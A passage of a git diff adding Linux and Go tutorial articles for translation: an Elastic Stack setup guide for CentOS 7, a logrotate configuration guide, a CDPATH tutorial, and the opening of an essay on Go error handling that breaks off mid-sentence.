gpw_e24=http:%2F%2Fwww.oracle.com%2F; oraclelicense=accept-securebackup-cookie" "http://download.oracle.com/otn-pub/java/jdk/8u77-b02/jdk-8u77-linux-x64.rpm" + +Then install it with this rpm command; + +rpm -ivh jdk-8u77-linux-x64.rpm + +Finally, check java JDK version to ensure that it is working properly. + +java -version + +You will see Java version of the server. + +### Step 3 - Install and Configure Elasticsearch + +In this step, we will install and configure Elasticsearch. I will install Elasticsearch from an rpm package provided by elastic.co and configure it to run on localhost (to make the setup secure and ensure that it is not reachable from the outside). + +Before installing Elasticsearch, add the elastic.co key to the server. + +rpm --import https://artifacts.elastic.co/GPG-KEY-elasticsearch + +Next, download Elasticsearch 5.1 with wget and then install it. + +wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-5.1.1.rpm +rpm -ivh elasticsearch-5.1.1.rpm + +Elasticsearch is installed. Now go to the configuration directory and edit the elasticsaerch.yml configuration file. + +cd /etc/elasticsearch/ +vim elasticsearch.yml + +Enable memory lock for Elasticsearch by removing a comment on line 40\. This disables memory swapping for Elasticsearch. + +bootstrap.memory_lock: true + +In the 'Network' block, uncomment the network.host and http.port lines. + +network.host: localhost +http.port: 9200 + +Save the file and exit the editor. + +Now edit the elasticsearch.service file for the memory lock configuration. + +vim /usr/lib/systemd/system/elasticsearch.service + +Uncomment LimitMEMLOCK line. + +LimitMEMLOCK=infinity + +Save and exit. + +Edit the sysconfig configuration file for Elasticsearch. + +vim /etc/sysconfig/elasticsearch + +Uncomment line 60 and make sure the value is 'unlimited'. + +MAX_LOCKED_MEMORY=unlimited + +Save and exit. + +The Elasticsearch configuration is finished. Elasticsearch will run on the localhost IP address on port 9200, we disabled memory swapping for it by enabling mlockall on the CentOS server. + +Reload systemd, enable Elasticsearch to start at boot time, then start the service. + +sudo systemctl daemon-reload +sudo systemctl enable elasticsearch +sudo systemctl start elasticsearch + +Wait a second for Eelasticsearch to start, then check the open ports on the server, make sure 'state' for port 9200 is 'LISTEN'. + +netstat -plntu + +[ + ![Check elasticsearch running on port 9200](https://www.howtoforge.com/images/how-to-install-elastic-stack-on-centos-7/1.png) +][10] + +Then check the memory lock to ensure that mlockall is enabled, and check that Elasticsearch is running with the commands below. + +curl -XGET 'localhost:9200/_nodes?filter_path=**.mlockall&pretty' +curl -XGET 'localhost:9200/?pretty' + +You will see the results below. + +[ + ![Check memory lock elasticsearch and check status](https://www.howtoforge.com/images/how-to-install-elastic-stack-on-centos-7/2.png) +][11] + +### Step 4 - Install and Configure Kibana with Nginx + +In this step, we will install and configure Kibana with a Nginx web server. Kibana will listen on the localhost IP address and Nginx acts as a reverse proxy for the Kibana application. + +Download Kibana 5.1 with wget, then install it with the rpm command: + +wget https://artifacts.elastic.co/downloads/kibana/kibana-5.1.1-x86_64.rpm +rpm -ivh kibana-5.1.1-x86_64.rpm + +Now edit the Kibana configuration file. + +vim /etc/kibana/kibana.yml + +Uncomment the configuration lines for server.port, server.host and elasticsearch.url. + +server.port: 5601 +server.host: "localhost" +elasticsearch.url: "http://localhost:9200" + +Save and exit. + +Add Kibana to run at boot and start it. + +sudo systemctl enable kibana +sudo systemctl start kibana + +Kibana will run on port 5601 as node application. + +netstat -plntu + +[ + ![Kibana running as node application on port 5601](https://www.howtoforge.com/images/how-to-install-elastic-stack-on-centos-7/3.png) +][12] + +The Kibana installation is finished. Now we need to install Nginx and configure it as reverse proxy to be able to access Kibana from the public IP address. + +Nginx is available in the Epel repository, install epel-release with yum. + +yum -y install epel-release + +Next, install the Nginx and httpd-tools package. + +yum -y install nginx httpd-tools + +The httpd-tools package contains tools for the web server, we will use htpasswd basic authentication for Kibana. + +Edit the Nginx configuration file and remove the **'server { }**' block, so we can add a new virtual host configuration. + +cd /etc/nginx/ +vim nginx.conf + +Remove the server { } block. + +[ + ![Remove Server Block on Nginx configuration](https://www.howtoforge.com/images/how-to-install-elastic-stack-on-centos-7/4.png) +][13] + +Save and exit. + +Now we need to create a new virtual host configuration file in the conf.d directory. Create the new file 'kibana.conf' with vim. + +vim /etc/nginx/conf.d/kibana.conf + +Paste the configuration below. + +``` +server { +    listen 80; + +    server_name elk-stack.co; + +    auth_basic "Restricted Access"; +    auth_basic_user_file /etc/nginx/.kibana-user; + +    location / { +        proxy_pass http://localhost:5601; +        proxy_http_version 1.1; +        proxy_set_header Upgrade $http_upgrade; +        proxy_set_header Connection 'upgrade'; +        proxy_set_header Host $host; +        proxy_cache_bypass $http_upgrade; +    } +} +``` + +Save and exit. + +Then create a new basic authentication file with the htpasswd command. + +sudo htpasswd -c /etc/nginx/.kibana-user admin +TYPE YOUR PASSWORD + +Test the Nginx configuration and make sure there is no error. Then add Nginx to run at the boot time and start Nginx. + +nginx -t +systemctl enable nginx +systemctl start nginx + +[ + ![Add nginx virtual host configuration for Kibana Application](https://www.howtoforge.com/images/how-to-install-elastic-stack-on-centos-7/5.png) +][14] + +### Step 5 - Install and Configure Logstash + +In this step, we will install Logsatash and configure it to centralize server logs from clients with filebeat, then filter and transform the Syslog data and move it into the stash (Elasticsearch). + +Download Logstash and install it with rpm. + +wget https://artifacts.elastic.co/downloads/logstash/logstash-5.1.1.rpm +rpm -ivh logstash-5.1.1.rpm + +Generate a new SSL certificate file so that the client can identify the elastic server. + +Go to the tls directory and edit the openssl.cnf file. + +cd /etc/pki/tls +vim openssl.cnf + +Add a new line in the '[ v3_ca ]' section for the server identification. + +[ v3_ca ] + +# Server IP Address +subjectAltName = IP: 10.0.15.10 + +Save and exit. + +Generate the certificate file with the openssl command. + +openssl req -config /etc/pki/tls/openssl.cnf -x509 -days 3650 -batch -nodes -newkey rsa:2048 -keyout /etc/pki/tls/private/logstash-forwarder.key -out /etc/pki/tls/certs/logstash-forwarder.crt + +The certificate files can be found in the '/etc/pki/tls/certs/' and '/etc/pki/tls/private/' directories. + +Next, we will create new configuration files for Logstash. We will create a new 'filebeat-input.conf' file to configure the log sources for filebeat, then a 'syslog-filter.conf' file for syslog processing and the 'output-elasticsearch.conf' file to define the Elasticsearch output. + +Go to the logstash configuration directory and create the new configuration files in the 'conf.d' subdirectory. + +cd /etc/logstash/ +vim conf.d/filebeat-input.conf + +Input configuration: paste the configuration below. + +``` +input { +  beats { +    port => 5443 +    ssl => true +    ssl_certificate => "/etc/pki/tls/certs/logstash-forwarder.crt" +    ssl_key => "/etc/pki/tls/private/logstash-forwarder.key" +  } +} +``` + +Save and exit. + +Create the syslog-filter.conf file. + +vim conf.d/syslog-filter.conf + +Paste the configuration below. + +``` +filter { +  if [type] == "syslog" { +    grok { +      match => { "message" => "%{SYSLOGTIMESTAMP:syslog_timestamp} %{SYSLOGHOST:syslog_hostname} %{DATA:syslog_program}(?:\[%{POSINT:syslog_pid}\])?: %{GREEDYDATA:syslog_message}" } +      add_field => [ "received_at", "%{@timestamp}" ] +      add_field => [ "received_from", "%{host}" ] +    } +    date { +      match => [ "syslog_timestamp", "MMM  d HH:mm:ss", "MMM dd HH:mm:ss" ] +    } +  } +} +``` + +We use a filter plugin named '**grok**' to parse the syslog files. + +Save and exit. + +Create the output configuration file 'output-elasticsearch.conf'. + +vim conf.d/output-elasticsearch.conf + +Paste the configuration below. + +``` +output { +  elasticsearch { hosts => ["localhost:9200"] +    hosts => "localhost:9200" +    manage_template => false +    index => "%{[@metadata][beat]}-%{+YYYY.MM.dd}" +    document_type => "%{[@metadata][type]}" +  } +} +``` + +Save and exit. + +Finally add logstash to start at boot time and start the service. + +sudo systemctl enable logstash +sudo systemctl start logstash + +[ + ![Logstash started on port 5443 with SSL Connection](https://www.howtoforge.com/images/how-to-install-elastic-stack-on-centos-7/6.png) +][15] + +### Step 6 - Install and Configure Filebeat on the CentOS Client + +Beats are data shippers, lightweight agents that can be installed on the client nodes to send huge amounts of data from the client machine to the Logstash or Elasticsearch server. There are 4 beats available, 'Filebeat' for 'Log Files', 'Metricbeat' for 'Metrics', 'Packetbeat' for 'Network Data' and 'Winlogbeat' for the Windows client 'Event Log'. + +In this tutorial, I will show you how to install and configure 'Filebeat' to transfer data log files to the Logstash server over an SSL connection. + +Login to the client1 server. Then copy the certificate file from the elastic server to the client1 server.  + +ssh root@client1IP + +Copy the certificate file with the scp command. + +scp root@elk-serverIP:~/logstash-forwarder.crt . +TYPE elk-server password + +Create a new directory and move certificate file to that directory. + +sudo mkdir -p /etc/pki/tls/certs/ +mv ~/logstash-forwarder.crt /etc/pki/tls/certs/ + +Next, import the elastic key on the client1 server. + +rpm --import https://artifacts.elastic.co/GPG-KEY-elasticsearch + +Download Filebeat and install it with rpm. + +wget https://artifacts.elastic.co/downloads/beats/filebeat/filebeat-5.1.1-x86_64.rpm +rpm -ivh filebeat-5.1.1-x86_64.rpm + +Filebeat has been installed, go to the configuration directory and edit the file 'filebeat.yml'. + +cd /etc/filebeat/ +vim filebeat.yml + +In the paths section on line 21, add the new log files. We will add two files '/var/log/secure' for ssh activity and '/var/log/messages' for the server log. + +  paths: +    - /var/log/secure +    - /var/log/messages + +Add a new configuration on line 26 to define the syslog type files. + +  document-type: syslog + +Filebeat is using Elasticsearch as the output target by default. In this tutorial, we will change it to Logshtash. Disable Elasticsearch output by adding comments on the lines 83 and 85. + +Disable elasticsearch output. + +#-------------------------- Elasticsearch output ------------------------------ +#output.elasticsearch: +  # Array of hosts to connect to. +#  hosts: ["localhost:9200"] + +Now add the new logstash output configuration. Uncomment the logstash output configuration and change all value to the configuration that is shown below. + +output.logstash: +  # The Logstash hosts +  hosts: ["10.0.15.10:5443"] +  bulk_max_size: 1024 +  ssl.certificate_authorities: ["/etc/pki/tls/certs/logstash-forwarder.crt"] +  template.name: "filebeat" +  template.path: "filebeat.template.json" +  template.overwrite: false + +Save the file and exit vim. + +Add Filebeat to start at boot time and start it. + +sudo systemctl enable filebeat +sudo systemctl start filebeat + +### Step 7 - Install and Configure Filebeat on the Ubuntu Client + +Connect to the server by ssh. + +ssh root@ubuntu-clientIP + +Copy the certificate file to the client with the scp command. + +scp root@elk-serverIP:~/logstash-forwarder.crt . + +Create a new directory for the certificate file and move the file to that directory. + +sudo mkdir -p /etc/pki/tls/certs/ +mv ~/logstash-forwarder.crt /etc/pki/tls/certs/ + +Add the elastic key to the server. + +wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add - + +Download the Filebeat .deb package and install it with the dpkg command. + +wget https://artifacts.elastic.co/downloads/beats/filebeat/filebeat-5.1.1-amd64.deb +dpkg -i filebeat-5.1.1-amd64.deb + +Go to the filebeat configuration directory and edit the file 'filebeat.yml' with vim. + +cd /etc/filebeat/ +vim filebeat.yml + +Add the new log file paths in the paths configuration section. + +  paths: +    - /var/log/auth.log +    - /var/log/syslog + +Set the document type to syslog. + +  document-type: syslog + +Disable elasticsearch output by adding comments to the lines shown below. + +#-------------------------- Elasticsearch output ------------------------------ +#output.elasticsearch: +  # Array of hosts to connect to. +#  hosts: ["localhost:9200"] + +Enable logstash output, uncomment the configuration and change the values as shown below. + +output.logstash: +  # The Logstash hosts +  hosts: ["10.0.15.10:5443"] +  bulk_max_size: 1024 +  ssl.certificate_authorities: ["/etc/pki/tls/certs/logstash-forwarder.crt"] +  template.name: "filebeat" +  template.path: "filebeat.template.json" +  template.overwrite: false + +Save the file and exit vim. + +Add Filebeat to start at boot time and start it. + +sudo systemctl enable filebeat +sudo systemctl start filebeat + +Check the service status. + +systemctl status filebeat + +[ + ![Filebeat is running on the client Ubuntu](https://www.howtoforge.com/images/how-to-install-elastic-stack-on-centos-7/12.png) +][16] + +### Step 8 - Testing + +Open your web browser and visit the elastic stack domain that you used in the Nginx configuration,  mine is 'elk-stack.co'. Login as admin user with your password and press Enter to log in to the Kibana dashboard. + +[ + ![Login to the Kibana Dashboard with Basic Auth](https://www.howtoforge.com/images/how-to-install-elastic-stack-on-centos-7/7.png) +][17] + +Create a new default index 'filebeat-*' and click on the 'Create' button. + +[ + ![Create First index filebeat for Kibana](https://www.howtoforge.com/images/how-to-install-elastic-stack-on-centos-7/8.png) +][18] + +Th default index has been created. If you have multiple beats on the elastic stack, you can configure the default beat with just one click on the 'star' button. + +[ + ![Filebeat index as default index on Kibana Dashboard](https://www.howtoforge.com/images/how-to-install-elastic-stack-on-centos-7/9.png) +][19] + +Go to the '**Discover**' menu and you will see all the log file from the elk-client1 and elk-client2 servers. + +[ + ![Discover all Log Files from the Servers](https://www.howtoforge.com/images/how-to-install-elastic-stack-on-centos-7/10.png) +][20] + +An example of JSON output from the elk-client1 server log for an invalid ssh login. + +[ + ![JSON output for Failed SSH Login](https://www.howtoforge.com/images/how-to-install-elastic-stack-on-centos-7/11.png) +][21] + +And there is much more that you can do with Kibana dashboard, just play around with the available options. + +Elastic Stack has been installed on a CentOS 7 server. Filebeat has been installed on a CentOS 7 and a Ubuntu client. + +-------------------------------------------------------------------------------- + +via: https://www.howtoforge.com/tutorial/how-to-install-elastic-stack-on-centos-7/ + +作者:[Muhammad Arul][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.howtoforge.com/tutorial/how-to-install-elastic-stack-on-centos-7/ +[1]:https://www.howtoforge.com/tutorial/how-to-install-elastic-stack-on-centos-7/#step-nbspprepare-the-operating-system +[2]:https://www.howtoforge.com/tutorial/how-to-install-elastic-stack-on-centos-7/#step-install-java +[3]:https://www.howtoforge.com/tutorial/how-to-install-elastic-stack-on-centos-7/#step-install-and-configure-elasticsearch +[4]:https://www.howtoforge.com/tutorial/how-to-install-elastic-stack-on-centos-7/#step-install-and-configure-kibana-with-nginx +[5]:https://www.howtoforge.com/tutorial/how-to-install-elastic-stack-on-centos-7/#step-install-and-configure-logstash +[6]:https://www.howtoforge.com/tutorial/how-to-install-elastic-stack-on-centos-7/#step-install-and-configure-filebeat-on-the-centos-client +[7]:https://www.howtoforge.com/tutorial/how-to-install-elastic-stack-on-centos-7/#step-install-and-configure-filebeat-on-the-ubuntu-client +[8]:https://www.howtoforge.com/tutorial/how-to-install-elastic-stack-on-centos-7/#step-testing +[9]:https://www.howtoforge.com/tutorial/how-to-install-elastic-stack-on-centos-7/#reference +[10]:https://www.howtoforge.com/images/how-to-install-elastic-stack-on-centos-7/big/1.png +[11]:https://www.howtoforge.com/images/how-to-install-elastic-stack-on-centos-7/big/2.png +[12]:https://www.howtoforge.com/images/how-to-install-elastic-stack-on-centos-7/big/3.png +[13]:https://www.howtoforge.com/images/how-to-install-elastic-stack-on-centos-7/big/4.png +[14]:https://www.howtoforge.com/images/how-to-install-elastic-stack-on-centos-7/big/5.png +[15]:https://www.howtoforge.com/images/how-to-install-elastic-stack-on-centos-7/big/6.png +[16]:https://www.howtoforge.com/images/how-to-install-elastic-stack-on-centos-7/big/12.png +[17]:https://www.howtoforge.com/images/how-to-install-elastic-stack-on-centos-7/big/7.png +[18]:https://www.howtoforge.com/images/how-to-install-elastic-stack-on-centos-7/big/8.png +[19]:https://www.howtoforge.com/images/how-to-install-elastic-stack-on-centos-7/big/9.png +[20]:https://www.howtoforge.com/images/how-to-install-elastic-stack-on-centos-7/big/10.png +[21]:https://www.howtoforge.com/images/how-to-install-elastic-stack-on-centos-7/big/11.png diff --git a/sources/tech/20170122 Ultimate guide to configure logrotate utility.md b/sources/tech/20170122 Ultimate guide to configure logrotate utility.md new file mode 100644 index 0000000000..18f0b25567 --- /dev/null +++ b/sources/tech/20170122 Ultimate guide to configure logrotate utility.md @@ -0,0 +1,118 @@ +Ultimate guide to configure logrotate utility +============================================================ + + +Generally speaking Logs are very much important part of any troubleshooting activity, However these logs grows in size with time. In this case we need to perform log cleanup manually in order to reclaim the space and its tedious task to administer these logs. To overcome this we can configure logrotate utility available in Linux which automatically does rotation, compression , removal and mailing of logfile. + +We can configure logrotate utility so that each log file may be handled daily, weekly, monthly,or when it grows too large. + +How logrotate utility works: + +By default, the logrotate command runs as a cron job once a day from `/etc/cron.daily`, and it helps you set a policy where log-files that grow beyond a certain age or size are rotated. + +Command: `/usr/sbin/logrotate` + +Configuration File : `/etc/logrotate.conf` + +This is main configuration file for logrotate utility.The logrotate configuration files are also stored for specific services in the directory “`/etc/logrotate.d/`”.  Make sure below code exists in `/etc/logrotate.conf` for reading out service specific log rotation configuration. + +` include /etc/logrotate.d` + +Logrotate History: `/var/lib/logrotate.status` + +Important logrotate utility options: + + +``` +compress --> Compresses all noncurrent versions of the log file +daily,weekly,monthly -->Rotating log files on the specified schedule +delaycompress -->Compresses all versions but current and next-most-recent +endscript --> Marks the end of a prerotate or postrotate script +errors "emailid" --> Email error notification to specified emailaddr +missingok --> Do not complain if log file is missing +notifempty --> Does not rotate the log file if it is empty +olddir "dir" --> Specifies that older verions of the log file be placed in "dir" +postrotate --> Introduce a script to be run after log has been rotated +prerotate -->Introduce a script to be run before any changes are made +rotate 'n' -->Include 'n' versions of the log in the rotation scheme +sharedscripts -->Runs scripts only once for the entire log group +size='logsize' -->Rotates if log file size > 'logsize (eg 100K, 4M) +``` + +Let’s configure logrotate utility for our own sample log file “`/tmp/sample_output.log`”. + +Step1: Add below lines of code in the “`/etc/logrotate.conf`” file. + +``` +/tmp/sample_output.log { +size 1k +create 700 root root +rotate 4 +compress +} +``` + +In the above configuration code: + +* size 1k – logrotate runs only if the file size is equal to (or greater than) this size. +* create – rotate the original file and create the new file with specified permission, user and group. +* rotate – limits the number of log file rotation. So, this would keep only the recent 4 rotated log files. +* compress– This will compress the file. + +Step 2: Normally, you would have to wait a day until logrotate is started from `/etc/cron.daily`. As an alternative, you can run it from the command line using the following command: + +``` +/usr/sbin/logrotate /etc/logrotate.conf +``` + +Output Before execution of logrotate command: + +``` +[root@rhel1 tmp]# ls -l /tmp/ +total 28 +-rw-------. 1 root root 20000 Jan 1 05:23 sample_output.log +``` + +Output After execution of logrotate command: + +``` +[root@rhel1 tmp]# ls -l /tmp +total 12 +-rwx------. 1 root root 0 Jan 1 05:24 sample_output.log +-rw-------. 1 root root 599 Jan 1 05:24 sample_output.log-20170101.gz +[root@rhel1 tmp]# +``` + +So this confirms successful implementation of logrotate utility. + +-------------------------------------------------------------------------------- + +作者简介: + +Hi there! I am Manmohan Mirkar. I'm so happy you're here! I began this journey in Linux over 10 years ago and I would have never dreamed that I'd be where I am today. My passion is to help you get Knowledge on Linux.Thank you for being here! + +-------------------------------------------------------------------------------- + +via: http://www.linuxroutes.com/configure-logrotate/ + +作者:[Manmohan Mirkar][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://www.linuxroutes.com/author/admin/ +[1]:http://www.linuxroutes.com/configure-logrotate/# +[2]:http://www.linuxroutes.com/configure-logrotate/# +[3]:http://www.linuxroutes.com/configure-logrotate/# +[4]:http://www.linuxroutes.com/configure-logrotate/# +[5]:http://www.linuxroutes.com/configure-logrotate/# +[6]:http://www.linuxroutes.com/configure-logrotate/# +[7]:http://www.linuxroutes.com/configure-logrotate/# +[8]:http://www.linuxroutes.com/configure-logrotate/# +[9]:http://www.linuxroutes.com/configure-logrotate/# +[10]:http://www.linuxroutes.com/configure-logrotate/# +[11]:http://www.linuxroutes.com/configure-logrotate/# +[12]:http://www.linuxroutes.com/author/admin/ +[13]:http://www.linuxroutes.com/configure-logrotate/#respond +[14]:http://www.linuxroutes.com/configure-logrotate/# diff --git a/sources/tech/20170123 Linux command line navigation tipstricks 3 - the CDPATH environment variable.md b/sources/tech/20170123 Linux command line navigation tipstricks 3 - the CDPATH environment variable.md new file mode 100644 index 0000000000..9a03fb2102 --- /dev/null +++ b/sources/tech/20170123 Linux command line navigation tipstricks 3 - the CDPATH environment variable.md @@ -0,0 +1,128 @@ +Linux command line navigation tips/tricks 3 - the CDPATH environment variable +============================================================ + +### On this page + +1. [The CDPATH environment variable][1] +2. [Points to keep in mind][2] +3. [Conclusion][3] + +In the first part of this series, we discussed the **cd -** command in detail, and the in the second part, we took an in-depth look into the **pushd** and **popd** commands as well as the scenarios where-in they come in handy. + +Continuing with our discussion on the command line navigation aspects, in this tutorial, we'll discuss the **CDPATH** environment variable through easy to understand examples. We'll also discuss some advance details related to this variable. + +_But before we proceed, it's worth mentioning that all the examples in this tutorial have been tested on Ubuntu 14.04 with Bash version 4.3.11(1)._ + +### The CDPATH environment variable + +Even if your command line work involves performing all operations under a particular directory - say your home directory - then also you have to provide absolute paths while switching directories. For example, consider a situation where-in I am in _/home/himanshu/Downloads_ directory: + +$ pwd +/home/himanshu/Downloads + +And the requirement is to switch to the _/home/himanshu/Desktop_ directory. To do this, usually, I'll have to either run: + +cd /home/himanshu/Desktop/ + +or  + +cd ~/Desktop/ + +or + +cd ../Desktop/ + +Wouldn't it be easy if I could just run the following command: + +cd Desktop + +Yes, that's possible. And this is where the CDPATH environment variable comes in.You can use this variable to define the base directory for the **cd** command. + +If you try printing its value, you'll see that this env variable is empty by default: + +$ echo $CDPATH +$ + +Now, considering the case we've been discussing so far, let's use this environment variable to define _/home/himanshu_ as the base directory for the cd command. + +The easiest way to do this is: + +export CDPATH=/home/himanshu + +And now, I can do what I wasn't able to do earlier - from within the _/home/himanshu/Downloads_ directory, run the _cd Desktop_ command successfully. + +$ pwd +/home/himanshu/Downloads +$ **cd Desktop/** +**/home/himanshu/Desktop** +$ + +This means that I can now do a cd to any directory under _/home/himanshu_ without explicitly specifying _/home/himanshu_ or _~_ or _../_ (or multiple _../_)in the cd command. + +### Points to keep in mind + +So you now know how we used the CDPATH environment variable to easily switch to/from _/home/himanshu/Downloads_ from/to _/home/himanshu/Desktop_. Now, consider a situation where-in the _/home/himanshu/Desktop_ directory contains a subdirectory named _Downloads_, and it's the latter where you intend to switch. + +But suddenly you realize that doing a _cd Desktop_ will take you to _/home/himanshu/Desktop_. So, to make sure that doesn't happen, you do: + +cd ./Downloads + +While there's no problem in the aforementioned command per se, that's an extra effort on your part (howsoever little it may be), especially considering that you'll have to do this each time such a situation arises. A more elegant solution to this problem can be to originally set the CDPATH variable in the following way: + +export CDPATH=".:/home/himanshu" + +This means, you're telling the cd command to first look for the directory in the current working directory, and then try searching the _/home/himanshu_ directory. Of course, whether or not you want the cd command to behave this way depends entirely on your preference or requirement - my idea behind discussing this point was to let you know that this kind of situation may arise. + +As you would have understood by now, once the CDPATH env variable is set, it's value - or the set of paths it contains - are the only places on the system where the cd command searches for directories (except of course the scenarios where-in you use absolute paths). So, it's entirely up to you to make sure that the behavior of the command remains consistent. + +Moving on, if there's a bash script that uses the cd command with relative paths, then it's better to clear or unset the CDPATH environment variable first, unless you are ok with getting trapped into unforeseen problems. Alternatively, rather than using the _export_ command on the terminal to set CDPATH, you can set the environment variable in your `.bashrc` file after testing for interactive/non-interactive shells to make sure that the change you're trying to make is only reflected in interactive shells. + +The order in which paths appear in the environment variable's value is also important. For example, if current directory is listed before _/home/himanshu_, then the cd command will first search for a directory in the present working directory and then move on to _/home/himanshu_. However, if the value is _"/home/himanshu:."_ then the first search will be made in _/home/himanshu_ and after that the current directory. Needless to say, this will effect what the cd command does, and may cause problems if you aren't aware of the order of paths. + +Always keep in mind that the CDPATH environment variable, as the name suggests, works only for the cd command. This means that while inside the _/home/himanshu/Downloads_ directory, you can run the _cd Desktop_ command to switch to _/home/himanshu/Desktop_ directory, but you can't do an _ls_. Here's an example: + +$ pwd +/home/himanshu/Downloads +**$ ls Desktop** +**ls: cannot access Desktop: No such file or directory** +$ + +However, there could be some simple workarounds. For example, we can achieve what we want with minimal effort in the following way: + +$ **cd Desktop/;ls** +/home/himanshu/Desktop +backup backup~ Downloads gdb.html outline~ outline.txt outline.txt~ + +But yeah, there might not be a workaround for every situation. + +Another important point: as you might have observed, whenever you use the cd command with the CDPATH environment variable set, the command produces the full path of directory you are switching to in the output. Needless to say, not everybody would want to have this information each time they run the cd command on their machine.  + +To make sure this output gets suppressed, you can use the following command: + +alias cd='>/dev/null cd' + +The aforementioned command will mute the output whenever the cd command is successful, but will allow the error messages to be produced whenever the command fails. + +Lastly, in case you face a problem where-in after setting the CDPATH environment variable, you can't use the shell's tab completion feature, then you can try installing and enabling bash-completion - more on it [here][4]. + +### Conclusion + +The CDPATH environment variable is a double edged sword - if not used with caution and complete knowledge, it may land you in some complex traps that may require a lot of your time precious time to get resolved. Of course, that doesn't mean you should never give it a try; just evaluate all the available options and if you conclude that using CDPATH would be of great help, then do go ahead and use it. + +Have you been using CDPATH like a pro? Do you have some more tips to share? Please share your thoughts in comments below. + +-------------------------------------------------------------------------------- + +via: https://www.howtoforge.com/tutorial/linux-command-line-tips-tricks-part-3-cdpath/ + +作者:[Ansh][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.howtoforge.com/tutorial/linux-command-line-tips-tricks-part-3-cdpath/ +[1]:https://www.howtoforge.com/tutorial/linux-command-line-tips-tricks-part-3-cdpath/#the-cdpath-environment-variable +[2]:https://www.howtoforge.com/tutorial/linux-command-line-tips-tricks-part-3-cdpath/#points-to-keep-in-mind +[3]:https://www.howtoforge.com/tutorial/linux-command-line-tips-tricks-part-3-cdpath/#conclusion +[4]:http://bash-completion.alioth.debian.org/ diff --git a/sources/tech/20170123 What I Dont Like About Error Handling in Go and How to Work Around It.md b/sources/tech/20170123 What I Dont Like About Error Handling in Go and How to Work Around It.md new file mode 100644 index 0000000000..2ed55758a2 --- /dev/null +++ b/sources/tech/20170123 What I Dont Like About Error Handling in Go and How to Work Around It.md @@ -0,0 +1,354 @@ +What I Don’t Like About Error Handling in Go, and How to Work Around It +====================== + +More often than not, people who write Go have some sort of opinion on its error handling model. Depending on your experience with other languages, you may be used to different approaches. That’s why I’ve decided to write this article, as despite being relatively opinionated, I think drawing on my experiences can be useful in the debate. The main issues I wanted to cover are that it is difficult to force good error handling practice, that errors don’t have stack traces, and that error handling itself is too verbose. However I’ve looked at some potential workarounds for these problems which could help negate the issues somewhat. + +### Quick Comparison to Other Languages + + +[In Go, all errors are values][1]. Because of this, a fair amount of functions end up returning an `error`, looking something like this: + +``` +func (s *SomeStruct) Function() (string, error) +``` + +As a result of this, the calling code will regularly have `if` statements to check for them: + +``` +bytes, err := someStruct.Function() +if err != nil { + // Process error +} +``` + +Another approach is the `try-catch` model that is used in other languages such as Java, C#, Javascript, Objective C, Python etc. You could see the following Java code as synonymous to the previous Go examples, declaring `throws` instead of returning an `error`: + +``` +public String function() throws Exception +``` + +And then doing `try-catch` instead of `if err != nil`: + +``` +try { + String result = someObject.function() + // continue logic +} +catch (Exception e) { + // process exception +} +``` + +Of course, there are more differences than this. For example, an `error` can’t crash your program, whereas an `Exception` can. There are others as well, and I want to focus on them in this article. + +### Implementing Centralised Error Handling + +Taking a step back, let’s look at why and how we might want to have a centralised place for handling errors. + +An example most people would be familiar with is a web service – if some unexpected server-side error were to happen, we would generate a 5xx error. At a first pass in Go you might implement this: + +``` +func init() { + http.HandleFunc("/users", viewUsers) + http.HandleFunc("/companies", viewCompanies) +} + +func viewUsers(w http.ResponseWriter, r *http.Request) { + user // some code + if err := userTemplate.Execute(w, user); err != nil { + http.Error(w, err.Error(), 500) + } +} + +func viewCompanies(w http.ResponseWriter, r *http.Request) { + companies = // some code + if err := companiesTemplate.Execute(w, companies); err != nil { + http.Error(w, err.Error(), 500) + } +} +``` + +This isn’t a good solution, as we would have to repeat the same error handling across all of our handler functions. It would be much better to do it all in one place for maintainability purposes. Fortunately, there is [an alternative by Andrew Gerrand on the Go blog][2] which works quite nicely. We can create a Type which does http error handling: + +``` +type appHandler func(http.ResponseWriter, *http.Request) error + +func (fn appHandler) ServeHTTP(w http.ResponseWriter, r *http.Request) { + if err := fn(w, r); err != nil { + http.Error(w, err.Error(), 500) + } +} +``` + +And then it can be used as a wrapper to decorate our handlers: + +``` +func init() { + http.Handle("/users", appHandler(viewUsers)) + http.Handle("/companies", appHandler(viewCompanies)) +} +``` + +Then all we need to do is change the signature of handler functions so they return `errors`. This works nicely, as we have been able to apply the [dry][3] principle and not re-use code unnecessarily – now we return default errors in a single place. + +### Error Context + +In the previous example, there are many potential errors which we could receive, all of which could be generated in many parts of the call stack. This is when things start to get tricky. + +To demonstrate this, we can expand on our handler. It’s more likely to look like this as the template execution is not the only place where an error could occur: + +``` +func viewUsers(w http.ResponseWriter, r *http.Request) error { + user, err := findUser(r.formValue("id")) + if err != nil { + return err; + } + return userTemplate.Execute(w, user); +} +``` + +The call chain could get quite deep, and throughout it, all sorts of errors could be instantiated in different places. This post by [Russ Cox][4] explains the best practice to prevent this from being too much of a problem: + +> Part of the intended contract for error reporting in Go is that functions include relevant available context, including the operation being attempted (such as the function name and its arguments) + +The example given is a call to the OS package: + +``` +err := os.Remove("/tmp/nonexist") +fmt.Println(err) +``` + +Which prints the output: + +``` +remove /tmp/nonexist: no such file or directory +``` + +To summarise, you are outputting the method called, the arguments given, and the specific thing that went wrong, immediately after doing it. When creating an `Exception` message in another language you would also follow this practice. So if we stuck to these rules in our `viewUsers` handler, it could almost always be clear what the cause of an error is. + +The problem comes from people not following this best practice, and quite often in third party Go libraries you will see messages like: + +``` +Oh no I broke +``` + +Which is just not helpful – you don’t know anything about the context which makes it really hard to debug. Even worse is when these sorts of errors are ignored or returned really far back up the stack until they are handled: + +``` +if err != nil { + return err +} +``` + +This means that when they happened isn’t communicated. + +It should be noted that all these mistakes can be made in an `Exception` driven model – poor error messages, swallowing exceptions etc. So why do I think that model is more helpful? + +If we’re dealing with a poor exception message, _we are still able 